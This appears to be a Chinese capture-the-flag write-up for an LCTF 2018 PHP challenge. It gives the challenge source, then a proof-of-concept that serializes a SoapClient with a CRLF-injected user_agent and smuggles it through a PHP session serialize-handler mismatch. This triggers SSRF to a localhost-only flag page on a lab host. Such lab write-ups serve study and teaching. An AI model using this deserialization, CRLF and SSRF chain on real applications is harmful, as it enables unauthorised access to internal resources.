题目源码
index.PHP
<?PHP highlight_file(__FILE__); $b = 'implode'; //可被覆盖 call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'] = $_GET['name']; } var_dump($_SESSION); $a = array(reset($_SESSION), 'welcome_to_the_lctf2018'); call_user_func($b, $a); ?>
flag.PHP
<?PHP session_start(); echo 'only localhost can get flag!'; $flag = 'LCTF{*************************}';
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){ //要通过ssrf来获取flag $_SESSION['flag'] = $flag; }?>
解题思路:利用session反序列化触发soapclient类方法进行ssrf访问flag,PHP
第一步:
session反序列化需要session.serialize_handler使用与默认不一样,所以首先用第一个call_user_func执行session_start('session.serialize_handler','PHP_serialize')设置用PHP_serialize来处理session,同时session反序列化时构造的类为soapclient
利用soapclient构造ssrf
<?PHP $a = new SoapClient(null, array( 'user_agent' => "aaa\r\nCookie:PHPSESSID=u6ljl69tjrbutbq4i0oeb0m332", //这里可以通过加crlf的方法控制header,带上自己的sessionid 'uri' => 'bbb', 'location' => 'http://ae0bb0f2-f512-4118-8f03-60a13b829c0a.node4.buuoj.cn:81/flag.PHP' //向此处发起请求 ) ); $b = serialize($a); echo urlencode($b);
?>
然后将其前加|传入name中(写入session并被PHP解析为键值)
此时name被通过PHP_serialize处理写入了session数组中
第二步:
要想办法触发soapclient的序列化值,要先调用其中的_call,此时用PHP引擎来反序列化session,$a数组中第一项即为我们构造的soapclient类,在第二个call_user_func中让这个类调用不存在的方法即可触发ssrf
做题过程中遇到了一个坑,如果soapclient发起请求中带的sessionid是自己在本题环境中拿到的sessionid则第二步会造成死循环引发504错误
回头看思路有迹可循但确实好难想到啊
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。